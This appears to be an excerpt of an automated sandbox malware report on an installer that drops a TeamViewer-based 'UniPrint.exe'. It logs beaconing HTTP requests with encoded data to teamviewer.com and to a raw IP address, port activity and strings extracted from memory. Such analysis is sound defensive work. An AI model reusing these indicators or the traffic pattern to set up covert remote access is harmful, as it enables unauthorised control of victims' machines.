Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12418339&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12418339&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/client=DynGate&rnd=78504903&p=10000001
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=100000012
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001N&
Source: UniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001v
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=1000
Source: UniPrint.exe, 00000004.00000003.432909141.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002
Source: UniPrint.exe, 00000004.00000003.432909141.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002l
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000001&client=DynGate
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGate
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGated
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: svchost.exe, 00000003.00000002.545837085.0000024FB0060000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: svchost.exe, 00000003.00000002.538052811.0000024FB000E000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://go.teamviewer.comn0
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.295831421.00000000057A6000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001
Source: UniPrint.exe, 00000004.00000003.295831421.00000000057A6000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001ayTo-UPnP-E
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001q
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001&%
Source: UniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001ZqcGy
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=40082859&client=DynGate&p=10000002
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=40082864&client=DynGate&p=10000002er12.teamviewer.com
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=40082873&client=DynGate&p=10000002W
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5Mko
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6s
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeq
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://mastr12.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=7
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://mastr12.teamviewer.com/din.aspx?s=4082873&client=DynGate&p=100
Source: wogZe27GBB.exe, wogZe27GBB.exe, 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: wogZe27GBB.exe, 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
Source: UniPrint.exe, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmpString found in binary or memory: http://www.TeamViewer.com
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.TeamViewer.com/download
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.TeamViewer.com/help
Source: svchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000002.00000002.294871479.0000000002870000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.349624220.0000000002830000.00000004.00000001.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000003.344077474.00000000028E1000.00000004.00000001.sdmp, UniPrint.exe, 00000012.00000002.372091300.0000000002860000.00000004.00000001.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000003.370863061.0000000002831000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/download/beta.aspx
